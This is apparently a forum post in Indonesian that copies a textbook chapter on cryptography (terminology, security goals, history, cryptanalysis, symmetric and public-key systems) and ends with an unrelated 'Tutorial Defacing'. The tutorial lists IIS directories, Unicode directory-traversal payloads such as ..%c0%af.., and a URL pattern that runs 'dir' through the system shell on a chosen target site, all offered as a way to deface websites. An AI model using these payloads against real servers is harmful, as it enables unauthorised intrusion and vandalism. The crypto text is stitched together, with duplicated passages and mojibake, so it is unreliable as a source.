komunikasi mungkin saja data yang dikirim disadap oleh pihak ketiga, namun pihak ketiga
ini tidak dapat mengembalikan cipherteks ke plainteksnya karena ia tidak mengetahui
kunci untuk dekripsi.
Meski berusia relatif muda (sejak 1976), kriptografi kunci-publik mempunyai kontribusi
yang luar biasa dibandingkan dengan sistem kriptografi simetri. Kontribusi yang paling
penting adalah tanda-tangan digital pada pesan untuk memberikan aspek keamanan
otentikasi, integritas data, dan nirpenyangkalan. Tanda-tangan digital adalah nilai
kriptografis yang bergantung pada isi pesan dan kunci yang digunakan. Pengirim pesan
mengenkripsi pesan (yang sudah diringkas) dengan kunci privatnya, hasil enkripsi inilah
yang dinamakan tanda-tangan digital. Tanda-tangan digital dilekatkan (embed) pada pesan
asli. Penerima pesan memverifikasi tanda-tangan digital dengan menggunaklan kunci
publik.
sekian penjelasan dari ane, cry lw tulisannya g rapi
Sumber
transaksi di bank, transaksi dengan kartu kredit, percakapan melalui telepon genggam,
mengakses internet, sampai mengaktifkan peluru kendali pun menggunakan kriptografi.
Begitu pentingnya kriptografi untuk keamanan informasi (information security), sehingga
jika berbicara mengenai masalah keamanan yang berkaitan dengan penggunaan komputer,
maka orang tidak bisa memisahkannya dengan kriptografi. kali ini memperkenalkan
kriptografi dan terminologi yang berkaitan dengannya. Dibahas pula mengenai sejarah,
tujuan yang ingin dicapai dengan kriptografi, dan beberapa contoh penggunaan kriptografi.
1.1 Definisi dan Terminologi
Jika anda bertukar pesan (misalnya surat) dengan orang lain, maka anda tentu ingin pesan
yang anda kirim sampai ke pihak yang dituju dengan aman. Pengertian aman di sini sangat
luas. Aman bisa berarti bahwa selama pengiriman pesan tentu anda berharap pesan tersebut
tidak dibaca oleh orang yang tidak berhak. Sebab, mungkin saja pesan yang anda kirim
berisi sesuatu yang rahasia sehingga jika pesan rahasia dibaca oleh pihak lawan atau pihak
yang tidak berkepentingan, maka bocorlah kerahasiaan pesan yang anda kirim. Ini adalah
masalah keamanan pesan yang dinamakan kerahasiaan (confidentiality atau privacy).
Aman bisa juga berarti bahwa anda ingin pesan yang dikirim sampai dengan utuh ke
tangan penerima, artinya isi pesan tidak diubah atau dimanipulasi selama pengiriman oleh
pihak ketiga. Di sisi penerima pesan, ia tentu ingin memastikan bahwa pesan yang ia
terima adalah pesan yang masih asli, bukan pesan yang sudah ditambah-tambah atau
dikurangi. Ini adalah masalah keamanan pesan yang disebut integritas data (data
integrity). Selain itu, penerima yakin bahwa pesan tersebut memang benar berasal dari
anda, bukan dari orang lain yang menyamar seperti anda, dan anda pun yakin bahwa orang
yang anda kirimi pesan adalah orang yang sesungguhnya. Ini adalah masalah keamanan
pesan yang dinamakan otentikasi (auhentication).
Jika anda sebagai penerima pesan, anda pun tidak ingin kelak pengirim pesan membantah
pernah mengirim pesan kepada anda. Ini adalah masalah keamanan yang disebut
penyangkalan (repudiaton). Zaman sekarang banyak orang yang membantah telah
mengirim atau menerima pesan. Padahal anda yakin bahwa anda memang menerima pesan
dari orang tersebut. Jika pengirim membantah telah mengirim pesan, maka anda perlu
membuktikan ketidakbenaran penyangkalan tersebut (non-repudiation).
Keempat masalah keamanan yang disebutkan di atas, yaitu kerahasiaan, integritas data,
otentikasi, dan penyangkalan dapat diselesaikan dengan menggunakan kriptografi.
Kriptografi tidak hanya menyediakan alat untuk keamanan pesan, tetapi juga sekumpulan
teknik yang berguna.
Kriptografi (cryptography) berasal dari Bahasa Yunani: “cryptós†artinya “secretâ€
(rahasia), sedangkan “gráphein†artinya “writing†(tulisan). Jadi, kriptografi berarti “secret
writing†(tulisan rahasia). Ada beberapa definisi kriptografi yang telah dikemukakan di
dalam berbagai literatur. Definisi yang dipakai di dalam buku-buku yang lama (sebelum
tahun 1980-an) menyatakan bahwa kriptografi adalah ilmu dan seni untuk menjaga
kerahasian pesan dengan cara menyandikannya ke dalam bentuk yang tidak dapat
dimengerti lagi maknanya. Definisi ini mungkin cocok pada masa lalu di mana kriptografi
digunakan untuk keamanan komunikasi penting seperti komunikasi di kalangan militer,
diplomat, dan mata-mata. Namun saat ini kriptografi lebih dari sekadar privacy, tetapi juga
untuk tujuan data integrity, authentication, dan non-repudiation.
Definisi yang kita pakai di dalam buku ini mengutip definisi yang dikemukakan di dalam
[SCH96]:
Kriptografi adalah ilmu dan seni untuk menjaga keamanan pesan
(Cryptography is the art and science of keeping messages secure)
Sebagai pembanding, selain definisi tersebut di atas, terdapat pula definisi yang
dikemukakan di dalam [MEN96]:
Kriptografi adalah ilmu yang mempelajari teknik-teknik matematika yang
berhubungan dengan aspek keamanan informasi seperti kerahasiaan, integritas
data, serta otentikasi
Kata “seni†di dalam definisi di atas berasal dari fakta sejarah bahwa pada masa-masa awal
sejarah kriptografi, setiap orang mungkin mempunyai cara yang unik untuk merahasiakan
pesan. Cara-cara unik tersebut mungkin berbeda-beda pada setiap pelaku kriptografi
sehingga setiap cara menulis pesan rahasia pesan mempunyai nilai estetika tersendiri
sehingga kriptografi berkembang menjadi sebuah seni merahasiakan pesan (kata “graphyâ€
di dalam “cryptography†itu sendiri sudah menyiratkan sebuah seni).
sehingga anda dapat mamahami bahwa kriptografi dapat dipandang sebagai sebuah seni
merahasiakan pesan. Pada perkembangan selanjutnya, kriptografi berkembang menjadi
sebuah disiplin ilmu sendiri karena teknik-teknik kriptografi dapat diformulasikan secara
matematik sehingga menjadi sebuah metode yang formal.
Terminologi
Di dalam kriptografi kita akan sering menemukan berbagai istilah atau terminologi.
Beberapa istilah yang penting untuk diketahui diberikan di bawah ini.
(a) Pesan, Plainteks, dan Cipherteks
Pesan (message) adalah data atau informasi yang dapat dibaca dan dimengerti
maknanya. Nama lain untuk pesan adalah plainteks (plaintext) atau teks-jelas
(cleartext). Pesan dapat berupa data atau informasi yang dikirim (melalui kurir, saluran
telekomunikasi, dsb) atau yang disimpan di dalam media perekaman (kertas, storage,
dsb). Pesan yang tersimpan tidak hanya berupa teks, tetapi juga dapat berbentuk citra
(image), suara/bunyi (audio), dan video, atau berkas biner lainnya.
Agar pesan tidak dapat dimengerti maknanya oleh pihak lain, maka pesan perlu
disandikan ke bentuk lain yang tidak dapat dipahami. Bentuk pesan yang tersandi
disebut cipherteks (ciphertext) atau kriptogram (cryptogram). Cipherteks harus dapat
ditransformasikan kembali menjadi plainteks semula agar pesan yang diterima bisa
dibaca. masingmasing berupa teks dan gambar, serta cipherteks yang berkoresponden. Perhatikan
bahwa plainteks dapat dibaca dengan jelas, tetapi cipherteks sudah tidak dapat lagi
dimengerti maknanya. Melalui proses yang berkebalikan, cipherteks dapat
ditransformasikan kembali menjadi plainteks semula.
(b) Pengirim dan penerima
Komunikasi data melibatkan pertukaran pesan antara dua entitas. Pengirim (sender)
adalah entitas yang mengirim pesan kepada entitas lainnya. Penerima (receiver)
adalah entitas yang menerima pesan. Entitas di sini dapat berupa orang, mesin
(komputer), kartu kredit, dan sebagainya. Jadi, orang bisa bertukar pesan dengan orang
lainnya (contoh: Alice berkomunikasi dengan Bob), sedangkan di dalam jaringan
komputer mesin (komputer) berkomunikasi dengan mesin (contoh: mesin ATM
berkomunikasi dengan komputer server di bank).
Pengirim tentu menginginkan pesan dapat dikirim secara aman, yaitu ia yakin bahwa
pihak lain tidak dapat membaca isi pesan yang ia kirim. Solusinya adalah dengan cara
menyandikan pesan menjadi cipherteks.
© Enkripsi dan dekripsi
Proses menyandikan plainteks menjadi cipherteks disebut enkripsi (encryption) atau
enciphering (standard nama menurut ISO 7498-2). Sedangkan proses mengembalikan
cipherteks menjadi plainteks semula dinamakan dekripsi (decryption) atau
deciphering (standard nama menurut ISO 7498-2). Enkripsi dan dekripsi dapat
diterapkan baika pada pesan yang dikirim maupun pada pesan tersimpan. Istilah
encryption of data in motion mengacu pada enkripsi pesan yang ditransmisikan
melalui saluran komunikasi, sedangkan istilah enrypton of data at-rest mengacu pada
enkripsi dokumen yang disimpan di dalam storage. Contoh encryption of data in
motion adalah pengiriman nomor PIN dari mesin ATM ke komputer server di kantor
bank pusat. Contoh encryption of data at-rest adalah enkripsi file basis data di dalam
hard disk.
(d) Cipher dan kunci
Algoritma kriptografi disebut juga cipher yaitu aturan untuk enchipering dan
dechipering, atau fungsi matematika yang digunakan untuk enkripsi dan dekripsi.
Beberapa cipher memerlukan algoritma yang berbeda untuk enciphering dan
deciphering.
Konsep matematis yang mendasari algoritma kriptografi adalah relasi antara dua buah
himpunan yaitu himpunan yang berisi elemen-elemen plainteks dan himpunan yang
berisi cipherteks. Enkripsi dan dekripsi merupakan fungsi yang memetakan elemenelemen
antara kedua himpunan tersebut. Misalkan P menyatakan plainteks dan dan C
menyatakan chiperteks, maka fungsi enkripsi E memetakan P ke C,
E(P) = C
Dan fungsi dekripsi D memetakan C ke P,
D© = P
Karena proses enkripsi kemudian dekripsi mengembalikan pesan ke pesan asal, maka
kesamaan berikut harus benar,
D(E(P)) = P
Keamanan algoritma sering kriptografi diukur dari banyaknya kerja (work) yang
dibutuhkan untuk memecahkan chiperteks menjadi plainteksnya tanpa mengetahui
kunci yang digunakan. Kerja ini dapat diekivalenkan dengan waktu, memori, uang,
dan lain-lain. Semakin banyak kerja yang diperlukan, yang berarti juga semakin lama
waktu yang dibutuhkan, maka semakin kuat algoritma kriptografi tersebut, yang
berarti semakin aman digunakan untuk menyandikan pesan.
Jika keamanan kriptografi ditentukan dengan menjaga kerahasiaan algoritmanya, maka
algoritma kriptografinya dinamakan algoritma restricted. Algoritma restricted
mempunyai sejarah tersendiri di dalam kriptografi. Algoritma restricted biasanya
digunakan oleh sekelompok orang untuk bertukar pesan satu sama lain. Mereka
membuat suatu algoritma enkripsi dan algoritma enkripsi tersebut hanya diketahui oleh
anggota kelompok itu saja. Tetapi, algoritma restricted tidak cocok lagi saat ini, sebab
setiap kali ada anggota kelompok keluar, maka algoritma kriptografi harus diganti lagi.
Kriptografi modern mengatasi masalah di atas dengan penggunaan kunci, yang dalam
hal ini algoritma tidak lagi dirahasiakan, tetapi kunci harus dijaga kerahasiaannya.
Kunci (key) adalah parameter yang digunakan untuk transformasi enciphering dan
dechipering. Kunci biasanya berupa string atau deretan bilangan. Dengan
menggunakan kunci K, maka fungsi enkripsi dan dekripsi dapat ditulis sebagai
EK(P) = C dan DK© = P
dan kedua fungsi ini memenuhi
DK(EK(P)) = P
Istilah “cipher†sering disamakan dengan kode (code). Kode mempunyai sejarah
tersendiri di dalam kriptografi. Sebenarnya kedua istilah ini tidak sama pengertiannya.
Jika cipher adalah transformasi karakter-ke-karakter atau bit-ke-bit tanpa
memperhatikan struktur bahasa pesan, maka kode sering diacu sebagai prosedur yang
mengganti setiap plainteks dengan kata kode, misalnya
kapal api datang dikodekan menjadi hutan bakau hancur
Kode juga dapat berupa deretan angka dan huruf yang tidak bermakna, seperti
kapal api datang dikodekan menjadi xyztvq bkugbf hjqpot
Transformasi dari plainteks menjadi kode sering disebut encoding, sedangkan
transformasi kebalikannya sering disebut decoding. Di dalam kriptografi, buku kode
(codebook) – . Buku kode terdiri dari tabel lookup (lookup
table) untuk encoding dan decoding. Untuk melakukan enkripsi dan dekripsi pesan,
buku kode yang sama harus tersedia di sisi pengirim dan penerima pesan. Penyebaran
buku kode menimbulkan masalah tersendiri menyangkut keamanannya, sehingga
penggunaan kode di dalam kriptografi tidak mempunyai umur yang panjang dan
cipher menjadi teknik yang dominan. Pihak lawan yang mencoba mentransformasikan
kode menajdi plainteks dinamakan pemecah kode (codebreaker).
(e) Sistem Kriptografi
Kriptografi membentuk sebuah sistem yang dinamakan sistem kriptografi. Sistem
kriptografi (cryptosystem) adalah kumpulan yang terdiri dari algoritma kriptografi,
semua plainteks dan cipherteks yang mungkin, dan kunci [SCH96]. Di dalam sistem
kriptografi, cipher hanyalah salah satu komponen saja.
(g) Penyadap
Penyadap (eavesdropper) adalah orang yang mencoba menangkap pesan selama
ditransmisikan. Tujuan penyadap adalah untuk mendapatkan informasi sebanyakbanyaknya
mengenai sistem kriptografi yang digunakan untuk berkomunikasi dengan
maksud untuk memecahkan cipherteks. Nama lain penyadap: enemy, adversary,
intruder, interceptor, bad guy. Ron Rivest, seorang pakar kriptografi, menyatakan
bahwa cryptography is about communication in the presence of adversaries
(Kriptografi adalah perihal berkomunikasi dengan keberadaan pihak musuh) [WIK06].
(f) Kriptanalisis dan kriptologi
Kriptografi berkembang sedemikian rupa sehingga melahirkan bidang yang
berlawanan yaitu kriptanalisis. Kriptanalisis (cryptanalysis) adalah ilmu dan seni
untuk memecahkan chiperteks menjadi plainteks tanpa mengetahui kunci yang
digunakan. Pelakunya disebut kriptanalis. Jika seorang kriptografer (cryptographer)
mentransformasikan plainteks menjadi cipherteks dengan suatu algoritma dan kunci
maka sebaliknya seorang kriptanalis berusaha untuk memecahkan cipherteks tersebut
untuk menemukan plainteks atau kunci. Kriptologi (cryptology) adalah studi
mengenai kriptografi dan kriptanalisis. Baik kriptografi maupun kriptanalisis keduanya
saling berkaitan.
Sebagian para parktisi sering menggunakan istilah kriptografi dan kriptologi secara
bergantian, sebagian lagi membedakan bahwa kriptografi mengacu pada penggunaan
praktis teknik-tekink kriptografi, sedangkan kriptologi mengacu pada subjek sebagai
bidang studi (seperti halnya biologi, geologi, antropologi, dan sebagainya) [WIK06].
1.2 Tujuan Kriptografi
Dari paparan awal di dalam upabab 1.1, kita dapat merangkum bahwa kriptografi bertujuan
untuk memberi layanan keamanan (yang juga dinamakan sebagai aspek-aspek keamanan)
sebagai berikut [SCH96][MEN96][WIK06]:
1. Kerahasiaan (confidentiality), adalah layanan yang ditujukan untuk menjaga agar
pesan tidak dapat dibaca oleh pihak-pihak yang tidak berhak. Di dalam kriptografi,
layanan ini direalisasikan dengan menyandikan pesan menjadi cipherteks. Misalnya
pesan “Harap datang pukul 8†disandikan menjadi “TrxC#45motyptre!%â€. Istilah lain
yang senada dengan confidentiality adalah secrecy dan privacy. Lebih jauh mengenai
metode penyandian akan dibahas di dalam bab-bab selanjutnya.
2. Integritas data (data integrity), adalah layanan yang menjamin bahwa pesan masih
asli/utuh atau belum pernah dimanipulasi selama pengiriman. Dengan kata lain, aspek
keamanan ini dapat diungkapkan sebagai pertanyaan: “Apakah pesan yang diterima
masih asli atau tidak mengalami perubahan (modifikasi)?â€. Untuk menjaga integritas
data, sistem harus memiliki kemampuan untuk mendeteksi manipulasi pesan oleh
pihak-pihak yang tidak berhak, antara lain penyisipan, penghapusan, dan
pensubsitusian data lain kedalam pesan yang sebenarnya. Di dalam kriptografi,
layanan ini direalisasikan dengan menggunakan tanda-tangan digital (digital
signature). Pesan yang telah ditandatangani menyiratkan bahwa pesan yang dikirim
adalah asli. Lebih jauh mengenai tanda-tangan digital akan dibahas di dalam Bab
Tanda-tangan Digital.
3. Otentikasi (authentication), adalah layanan yang berhubungan dengan identifikasi,
baik mengidentifikasi kebenaran pihak-pihak yang berkomunikasi (user authentication
atau entity authentication) maupun mengidentifikasi kebenaran sumber pesan (data
origin authentication). Dua pihak yang saling berkomunikasi harus dapat
mengotentikasi satu sama lain sehingga ia dapat memastikan sumber pesan. Pesan
yang dikirim melalui saluran komunikasi juga harus diotentikasi asalnya. Dengan kata
lain, aspek keamanan ini dapat diungkapkan sebagai pertanyaan: “Apakah pesan yang
diterima benar-benar berasal dari pengirim yang benar?â€. Otentikasi sumber pesan
secara implisit juga memberikan kepastian integritas data, sebab jika pesan telah
dimodifikasi berarti sumber pesan sudah tidak benar. Oleh karena itu, layanan
integritas data selalu dikombinasikan dengan layanan otentikasi umber pesan. Di
dalam kriptografi, layanan ini direalisasikan dengan menggunakan tanda-tangan digital
(digital signature). Tanda-tangan digital menyatakan sumber pesan.
4. Nirpenyangkalan (non-repudiation), adalah layanan untuk mencegah entitas yang
berkomunikasi melakukan penyangkalan, yaitu pengirim pesan menyangkal
melakukan pengiriman atau penerima pesan menyangkal telah menerima pesan. Sebagai
contoh misalkan pengirim pesan memberi otoritas kepada penerima pesan untuk
melakukan pembelian, namun kemudian ia menyangkal telah memberikan otoritas
tersebut. Contoh lainnya, misalkan seorang pemilik emas mengajukan tawaran
kepada toko mas bahwa ia akan menjual emasnya. Tetapi, tiba-tiba harga emas turun
drastis, lalu ia membantah telah mengajukan tawaran menjual emas. Dalam hal ini,
pihak toko emas perlu prosedur nirpenyangkalan untuk membuktikan bahwa pemilik
emas telah melakukan kebohongan.
Kriptografi mempunyai sejarah yang panjang. Informasi yang lengkap mengenai sejarah
kriptografi dapat ditemukan di dalam buku David Kahn yang berjudul The Codebreakers.
Buku yang tebalnya 1000 halaman ini menulis secara rinci sejarah kriptografi mulai dari
penggunaan kriptografi oleh Bangsa Mesir 4000 tahun yang lalu (berupa hieroglyph yang
tidak standard pada priamid) hingga penggunaan kriptografi pada abad ke-20. Secara
historis ada empat kelompok orang yang berkontribusi terhadap perkembangan kriptografi,
dimana mereka menggunakan kriptografi untuk menjamin kerahasiaan dalam komunikasi
pesan penting, yaitu kalangan militer (termasuk intelijen dan mata-mata), kalangan
diplomatik, penulis buku harian, dan pencinta (lovers). Di antara keempat kelompok ini,
kalangan militer yang memberikan kontribusi paling penting penting karena pengiriman
pesan di dalam suasana perang membutuhkan teknik enkripsi dan dekripsi yang rumit.
Sejarah kriptografi sebagian besar merupakan sejarah kriptografi klasik, yaitu metode
enkripsi yang menggunakan kertas dan pensil atau mungkin dengan bantuan alat mekanik
sederhana. Secara umum algoritma kriptografi klasik dikelompokkan menjadi dua kategori,
yaitu algoritma transposisi (transposition cipher) dan algoritma substitusi (substitution
cipher). Cipher transposisi mengubah susunan huruf-huruf di dalam pesan, sedangkan
cipher substitusi mengganti setiap huruf atau kelompok huruf dengan sebuah huruf atau
kelompok huruf lain. Sejarah kriptografi klasik mencatat penggunaan cipher transposisi
oleh tentara Sparta di Yunani pada permulaan tahun 400 SM. Mereka menggunakan alat
yang namanya scytale (Gambar 1.6(a)). Scytale terdiri dari sebuah kertas panjang dari
daun papyrus yang dililitkan pada sebuah silinder dari diameter tertentu (diameter silender
menyatakan kunci penyandian). Pesan ditulis secara horizontal, baris per baris (lihat
Gambar 1.6(b)). Bila pita dilepaskan, maka huruf-huruf di dalamnya telah tersusun secara
acak membentuk pesan rahasia. Untuk membaca pesan, penerima pesan harus melilitkan
kembali melilitkan kembali kertas tersebut ke silinder yang diameternya sama dengan
diameter silinder pengirim. Sedangkang algoritma substitusi paling awal dan paling
sederhana adalah Caesar cipher, yang digunakan oleh raja Yunani kuno, Julius Caesar.
Caranya adalah dengan mengganti setiap karakter di dalam alfabet dengan karakter yang
terletak pada tiga posisi berikutnya di dalam susunan alfabet.
Kriptografi juga digunakan untuk tujuan keamanan. Kalangan gereja pada masa awal
agama Kristen menggunakan kriptografi untuk menjaga tulisan relijius dari gangguan
otoritas politik atau budaya yang dominan saat itu. Mungkin yang sangat terkenal adalah
“Angka si Buruk Rupa (Number of the Beast) di dalam Kitab Perjanjian Baru. Angka
“666†menyatakan cara kriptografik (yaitu dienkripsi) untuk menyembunyikan pesan
berbahaya; para ahli percaya bahwa pesan tersebut mengacu pada Kerajaan Romawi
[WIK06].
Di India, kriptografi digunakan oleh pencinta (lovers) untuk berkomunikasi tanpa diketahui
orang. Bukti ini ditemukan di dalam buku Kama Sutra yang merekomendasikan wanita
seharusnya mempelajari seni memahami tulisan dengan cipher.
Pada Abad ke-17, sejarah kriptografi mencatat korban ketika ratu Skotlandia, Queen Mary,
dipancung setelah surat rahasianya dari balik penjara (surat terenkrpsi yang isinya rencana
membunuh Ratu Elizabeth I) berhasil dipecahkan oleh seorang pemecah kode.
Seperti yang telah disebutkan di atas bahwa kriptografi umum digunakan di kalangan
militer. Pada Perang Dunia ke II, Pemerintah Nazi Jerman membuat mesin enkripsi yang
dinamakan Enigma. (Gambar 1.7). Mesin yang menggunakan beberapa buah rotor (roda
berputar) ini melakukan enkripsi dengan cara yang sangat rumit. Namun Enigma cipher
berhasil dipecahkan oleh pihak Sekutu dan keberhasilan memecahkan Enigma sering
dikatakan sebagai faktor yang memperpendek perang dunia ke-2.
Kriptografi modern dipicu oleh perkembangan peralatan komputer digital. Dengan
komputer digital, cipher yang lebih kompleks menjadi sangat mungkin untuk dapat
dihasilkan. Tidak seperti kriptografi klasik yang mengenkripsi karakter per karakter
(dengan menggunakan alfabet tradisionil), kriptografi modern beroperasi pada string biner.
Cipher yang kompleks seperti DES (Data Encryption Standard) dan penemuan algoritma
RSA adalah algoritma kriptografi modern yang paling dikenal di dalam sejarah kriptografi
modern. Kriptografi modern tidak hanya berkaitan dengan teknik menjaga kerahasiaan
pesan, tetapi juga melahirkan konsep seperti tanda-tangan digital dan sertifikat digital.
Dengan kata lain, kriptografi modern tidak hanya memberikan aspek keamanan
confidentiality, tetapi juga aspek keamanan lain seperti otentikasi, integritas data, dan
nirpenyangkalan sebagaimana sudah dijelaskan di dalam upa-bab 1.2.
1.4 Kriptanalisis
Sejarah kriptografi paralel dengan sejarah kriptanalisis (cryptanalysis) , yaitu bidang ilmu
dan seni untuk memecahkan cipherteks. Kata “kriptanalisis†sendiri relatif masih baru
(pertama kali diungkapkan oleh William Friedman pada tahun 1920), namun sebenarnya
teknik kriptanalisis sudah ada sejak abad ke-9. Adalah seorang ilmuwan Arab pada Abad
IX bernama Abu Yusuf Yaqub Ibnu Ishaq Ibnu As-Sabbah Ibnu 'Omran Ibnu Ismail Al-
Kindi, atau yang lebih dikenal sebagai Al-Kindi yang menulis buku tentang seni
memecahkan kode. Dalam buku yang berjudul ‘Risalah fi Istikhraj al-Mu'amma
(Manuscript for the Deciphering Cryptographic Messages), ia menuliskan naskah untuk
menguraikan kode-kode rahasia (Gambar 1.8). Di dalam buku tersebut Al-Kindi
memperkenalkan teknik penguraian kode atau atau sandi yang sulit dipecahkan. Ia juga
mengklasifikasikan sandi rahasia itu serta menjelaskan ilmu fonetik Arab dan sintaksisnya.
Yang paling penting lagi, dalam bukunya ini ia mengenalkan penggunaan beberapa teknik
statistika untuk memecahkan kode-kode rahasia (dikutip dari Republika online, 16 Juni
2006).
Apa yang dilakukan oleh Al-Kindi didalam kriptanalisis dikenal dengan nama teknik
analisis frekuensi, yaitu teknik untuk memecahkan cipherteks berdasarkan frekuensi
kemunculan karakter di dalam pesan dan kaitannya dengan frekuensi kemunculan karakter
di dalam alfabet. Analisis frekuensi dilatarbelakangi oleh fakta bahwa cipher gagal
menyembunyikan statistik kemunculan karakter di dalam cipherteksnya. Misalnya, di
dalam Bahasa Inggris huruf “E†adalah huruf paling sering muncul di dalam kalimatkalimat
berbahas Inggris. Jika di dalam cipherteks terdapat huruf yang paling sering
muncul, maka kemungkinan besar huruf tersebut di dalam plainteksnya adalah huruf E
(teknik ini akan dijleaskan di dalam Bab 4). Berbagai cipher klasik berhasil dipecahkan
dengan teknik analisis frekuensi ini.
Teknik analisis frekuensi masih digunakan di dalam kriptanalisis modern, tetapi karena
cipher semakin rumit, maka pendekatan matematik masih tetap dominan dalam melakukan
kriptanalisis. Perkembangan komputer pun ikut membantu kegiatan kriptanilisis. Sejarah
kriptanalissi mencatat hasil gemilang seperti pemecahan Telegram Zimmermann yang
membawa Amerika Serikat ke kancah Perang Dunia I, dan pemecahan cipherteks dari
mesin Enigma ikut andil mengakhiri Perang Dunia II
1.5 Kriptografi Kunci-Simetri dan Nirsimetri
Selain berdasarkan sejarah yang membagi kriptografi menjadi kriptografi klasik dan
kriptografi modern, maka berdasarkan kunci yang digunakan untuk enkripsi dan dekripsi,
kriptografi dapat dibedakan lagi menjadi kriptografi kunci-simetri (symmetric-key
cryptography) dan kriptografi kunci-nirsimetri (asymmetric-key cryptography).
Pada sistem kriptografi kunci-simetri, kunci untuk enkripsi sama dengan kunci untuk
dekripsi, oleh karena itulah dinamakan kriptografi simetri. Istilah lain untuk
kriptografi kunci-simetri adalah kriptografi kunci privat (private-key cryptography),
kriptografi kunci rahasia (secret-key cryptography), atau kriptografi konvensional
(conventional cryptography). Sistem kriptografi kunci-simetri (atau disingkat menjadi
“kriptografi simetri†saja), mengasumsikan pengirim dan penerima pesan sudah berbagi
kunci yang sama sebelum bertukar pesan. Keamanan sistem kriptografi simetri terletak
pada kerahasiaan kuncinya. Kriptografi simetri merupakan satu-satunya jenis kriptografi
yang dikenal dalam catatan sejarah hingga tahun 1976. Semua algoritma kriptografi klasik
termasuk ke dalam sistem kriptografi simetri. Di sisi lain, ada puluhan algoritma
kriptografi modern yang termasuk ke dalam sistem kriptografi simetri, diantaranya adalah
DES (Data Encryption Standard), Blowfish, Twofish, Triple-DES, IDEA, Serpent, dan yang
terbaru adalah AES (Advanced Encryption Standard).
Secara umum, cipher yang termasuk ke dalam kriptografi simetri beroperasi dalam mode
blok (block cipher), yaitu setiap kali enkripsi/dekripsi dilakukan terhadap satu blok data
(yang berukuran tertentu), atau beroperasi dalam mode aliran (stream cipher), yaitu setiap
kali enkripsi/dekripsi dilakukan terhadap satu bit atau satu byte data. Aplikasi kriptografi
simetri yang utama adalah adalah melindungi kerahasiaan data yang dikirim melalui
saluran tidak aman dan melindungi kerahasiaan data yang disimpan pada media yang tidak
aman. Kelemahan dari sistem ini adalah baik pengirim maupun penerima pesan harus
memiliki kunci yang sama, sehingga pengirim pesan harus mencari cara yang aman untuk
memberitahukan kunci kepada penerima pesan.
Jika kunci untuk enkripsi tidak sama dengan kunci untuk dekripsi, maka kriptografinya
dinamakan sistem kriptografi nirsimetri. Nama lainnya adalah kriptogarfi kunci-publik
(public-key cryptography), sebab kunci untuk enkripsi tidak rahasia dan dapat diketahui
oleh siapapun (diumumkan ke publik), sementara kunci untuk dekripsi hanya diketahui
oleh penerima pesan (karena itu rahasia). Pada kriptografi jenis ini, setiap orang yang
berkomunikasi mempunyai sepasang kunci, yaitu kunci privat dan kunci publik. Pengirim
mengenkripsi pesan dengan menggunakan kunci publik si penerima pesan (receiver).
Hanya penerima pesan yang dapat mendekripsi pesan karena hanya ia yang mengetahui
kunci privatnya sendiri (Gambar 1.10). Contoh algoritma kriptografi kunci-publik
diantaranya RSA, Elgamal, DSA, dan sebagainya.
Kriptografi kunci-publik dapat dapat dianalogikan seperti kotak surat yang terkunci dan
memiliki lubang untuk memasukkan surat. Setiap orang dapat memasukkan surat ke dalam
kotak surat tersebut, tetapi hanya pemilik kotak yang dapat membuka kotak dan membaca
surat di dalamnya karena ia yang memiliki kunci. Keuntungan sistem ini ada dua. Pertama,
tidak ada kebutuhan untuk mendistribusikan kunci privat sebagaimana pada sistem
kriptografi simetri. Kunci publik dapat dikirim ke penerima melalui saluran yang sama
dengan saluran yang digunakan untuk mengirim pesan. Saluran untuk mengirim pesan
umumnya tidak aman.
Kedua, jumlah kunci dapat ditekan. Untuk berkomunikasi secara rahasia dengan banyak
orang tidak perlu kunci rahasia sebanyak jumlah orang tersebut, cukup membuat dua buah
kunci, yaitu kunci publik bagi para koresponden untuk mengenkripsi pesan, dan kunci
privat untuk mendekripsi pesan. Berbeda dengan kriptografi kunci-simetris dimana jumlah
kunci yang dibuat adalah sebanyak jumlah pihak yang diajak berkorespondensi. Contoh
penggunaan, misalkan jaringan komputer menghubungkan komputer karyawan di kantor
cabang dengan komputer menejer di kantor pusat. Seluruh kepala cabang diberitahu bahwa
kalau mereka mengirim laporan ke menejer di kantor pusat, mereka harus mengenkripsi
laporan tersebut dengan kunci publik menejer (kunci publik menejer diumumkan kepada
seluruh kepala cabang). Untuk mengembalikan laporan tersandi ke laporan semula, hanya
menejer yang dapat melakukan dekripsi, karena hanya dialah yang memegang kunci privat.
Selama proses transmisi cipherteks dari kantor cabang ke kantor pusat melalui saluran
komunikasi mungkin saja data yang dikirim disadap oleh pihak ketiga, namun pihak ketiga
ini tidak dapat mengembalikan cipherteks ke plainteksnya karena ia tidak mengetahui
kunci untuk dekripsi.
Meski berusia relatif muda (sejak 1976), kriptografi kunci-publik mempunyai kontribusi
yang luar biasa dibandingkan dengan sistem kriptografi simetri. Kontribusi yang paling
penting adalah tanda-tangan digital pada pesan untuk memberikan aspek keamanan
otentikasi, integritas data, dan nirpenyangkalan. Tanda-tangan digital adalah nilai
kriptografis yang bergantung pada isi pesan dan kunci yang digunakan. Pengirim pesan
mengenkripsi pesan (yang sudah diringkas) dengan kunci privatnya, hasil enkripsi inilah
yang dinamakan tanda-tangan digital. Tanda-tangan digital dilekatkan (embed) pada pesan
asli. Penerima pesan memverifikasi tanda-tangan digital dengan menggunaklan kunci
publik.
sekian penjelasan dari ane, cry lw tulisannya g rapi
Sumber
Tutorial Defacing
tutorial deface ...
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : http://www.target.loe contoh-->> http://www.target.com
2. Login
Ini Merupakan Directory yang Ada Di Web Site Tersebut
Directory Ini Di Configurasi Dengan Script tertentu Supayafile dalam Web tersebut Berhubungan Jika terjadi bug pada script nya maka kita bisa bembus web ini
ada beberapa contoh login diantaranya :
a)/_vti_bin
b)/_vti_cnf
c)/cgi-bin
d)/scripts
e)/msadc
3. Unicode --->> merupakan code yang dapat membaca script configurasi website tersebut code ini yang dapat membaca bug cgi nya
hasil codingnya seperti bisa 1-3 x pengulangan tergantung target yang akan kita hackinng
a) ..%c1%1c..
b) ..%c0%9v..
c) ..%c0%af..
d) ..%c0%qf..
e) ..%c1%8s..
f) ..%e0%80%af..
g) ..%c1%9c..
h) ..%c1%pc..
4. OS target -->>ini Menyatakan Sertificate Web Os kita WinNT dan Win98
0xB5 ISO 8859-1
0xC5 ISO 8859-1
0xEA CP437
0x2140 JIS X 0208
0x22 ISO 8859-1
5. Cara Kerja
Secara Garis Besar deface Ini dilakukan Dengan tiga Cara yaitu :
A.) Deface WebSite Perintah Echo
a.)Secara umum : http://target/login/unicode/os/system/c+dir atau http://www.target.com/login/unicode/os/system/c+dir
